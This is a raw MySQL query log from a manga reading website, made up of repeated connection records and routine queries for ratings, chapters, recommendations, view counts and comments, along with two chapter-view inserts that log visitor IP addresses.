average_rating FROM ratings where manga_id = '330' order by created desc 330640513 Quit 330640498 Quit 330640514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330640515 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='116' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330640514 Quit 330640516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330640516 Quit 330640517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330640517 Quit 330640518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330640518 Quit 330640519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330640519 Quit 330640520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330640520 Quit 330640521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330640521 Quit 330640522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330640522 Quit 330640523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330640523 Quit 330640524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330640524 Quit 330640525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330640525 Quit 330640526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330640526 Quit 330640527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330640527 Quit 330640528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330640528 Quit 330640529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330640529 Quit 330640530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330640530 Quit 330640531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330640531 Quit 330640532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330640532 Quit 330640533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330640533 Quit 330640534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330640534 Quit 330640535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330640535 Quit 330640536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330640536 Quit 330640537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330640537 Quit 330640538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330640538 Quit 330640539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330640539 Quit 330640540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330640540 Quit 330640541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330640541 Quit 330640542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330640542 Quit 330640543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330640543 Quit 330640544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330640544 Quit 330640545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330640545 Quit 330640546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330640546 Quit 330640547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330640547 Quit 330640548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330640548 Quit 330640549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330640549 Quit 330640550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330640550 Quit 330640551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330640551 Quit 330640552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330640552 Quit 330640553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330640553 Quit 330640554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330640554 Quit 330640555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330640555 Quit 330640556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330640556 Quit 330640557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330640557 Quit 330640558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330640558 Quit 330640559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330640559 Quit 330640560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330640560 Quit 330640561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330640561 Quit 330640562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330640562 Quit 330640563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330640563 Quit 330640564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330640564 Quit 330640565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330640565 Quit 330640566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330640566 Quit 330640567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330640567 Quit 330640568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330640568 Quit 330640569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330640569 Quit 330640570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330640570 Quit 330640571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330640571 Quit 330640572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330640572 Quit 330640573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330640573 Quit 330640574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330640574 Quit 330640575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330640575 Quit 330640576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330640576 Quit 330640577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330640577 Quit 330640578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330640578 Quit 330640579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330640579 Quit 330640580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330640580 Quit 330640581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330640581 Quit 330640582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330640582 Quit 330640583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330640583 Quit 330640584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330640584 Quit 330640585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330640585 Quit 330640586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330640586 Quit 330640587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330640587 Quit 330640588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330640588 Quit 330640589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330640589 Quit 330640590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330640590 Quit 330640591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330640591 Quit 330640592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330640592 Quit 330640593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330640593 Quit 330640594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330640594 Quit 330640595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330640595 Quit 330640596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330640596 Quit 330640597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330640597 Quit 330640598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330640598 Quit 330640599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330640599 Quit 330640600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330640600 Quit 330640601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330640601 Quit 330640602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330640602 Quit 330640603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330640603 Quit 330640604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330640604 Quit 330640605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330640605 Quit 330640606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330640606 Quit 330640607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330640607 Quit 330640608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330640608 Quit 330640609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330640609 Quit 330640610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330640610 Quit 330640611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330640611 Quit 330640612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330640612 Quit 330640613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330640613 Quit 330640614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330640614 Quit 330640615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330640615 Quit 330640616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330640616 Quit 330640617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330640617 Quit 330640618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330640618 Quit 330640619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330640619 Quit 330640620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330640620 Quit 330640621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330640621 Quit 330640622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330640622 Quit 330640623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330640623 Quit 330640624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330640624 Quit 330640625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330640625 Quit 330640626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330640626 Quit 330640627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330640627 Quit 330640628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330640628 Quit 330640629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330640629 Quit 330640630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330640630 Quit 330640631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330640631 Quit 330640632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330640632 Quit 330640633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640633 Quit 330640634 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17360' 330640634 Quit 330640635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640635 Query select * FROM chapters where id = '17360' 330640635 Quit 330640636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640636 Query select * FROM chapters where manga_id = '197' order by id desc 330640636 Quit 330640637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640637 Query Update chapters set view=view+1 where id = '17360' 330640637 Quit 330640638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640638 Query select * FROM chapters where id = '17360' 330640639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640638 Quit 330640639 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17360' 330640639 Quit 330640640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640640 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '17360', '2001:fb1:48:6661:8d81:4bcf:2330:c846', 'mangacherri.com', '2026-02-26 03:28:05', '2026-02-26 03:28:05') 330640640 Quit 330640641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640641 Query select * FROM chapter_images where chapter_id = '17360' 330640641 Quit 330640642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640642 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330640642 Quit 330640643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640643 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330640644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640644 Quit 330640645 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330640646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640647 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17578' 330640646 Quit 330640647 Quit 330640648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640648 Query select * FROM chapters where id = '17578' 330640648 Quit 330640649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640649 Query select * FROM chapters where manga_id = '268' order by id desc 330640649 Quit 330640650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640650 Query Update chapters set view=view+1 where id = '17578' 330640650 Quit 330640651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640651 Query select * FROM chapters where id = '17578' 330640651 Quit 330640652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640652 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17578' 330640653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640653 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('268', '17578', '89.246.103.217', 'mangacherri.com', '2026-02-26 03:28:05', '2026-02-26 03:28:05') 330640652 Quit 330640653 Quit 330640654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640654 Query select * FROM chapter_images where chapter_id = '17578' 330640654 Quit 330640655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640655 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '268' and m.active = 1 330640655 Quit 330640656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640656 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='268' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:28:06 330640515 Quit 330640657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640657 Query select * FROM comments where manga_id = '116' and parent_id is null order by created desc 330640657 Quit 330640658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640658 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '116' and m.active = 1 330640658 Quit 330640659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640659 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Comedy%' OR m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Shoujo%' OR m.genres like '%Slice of Life%') group by manga_id ORDER BY sum(view) DESC 330640659 Quit 330640660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640660 Quit 330640661 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330640661 Quit 330640662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330640662 Quit 330640663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640663 Query select * FROM chapters where manga_id = '116' order by created desc limit 1 330640663 Quit 330640643 Quit 330640664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 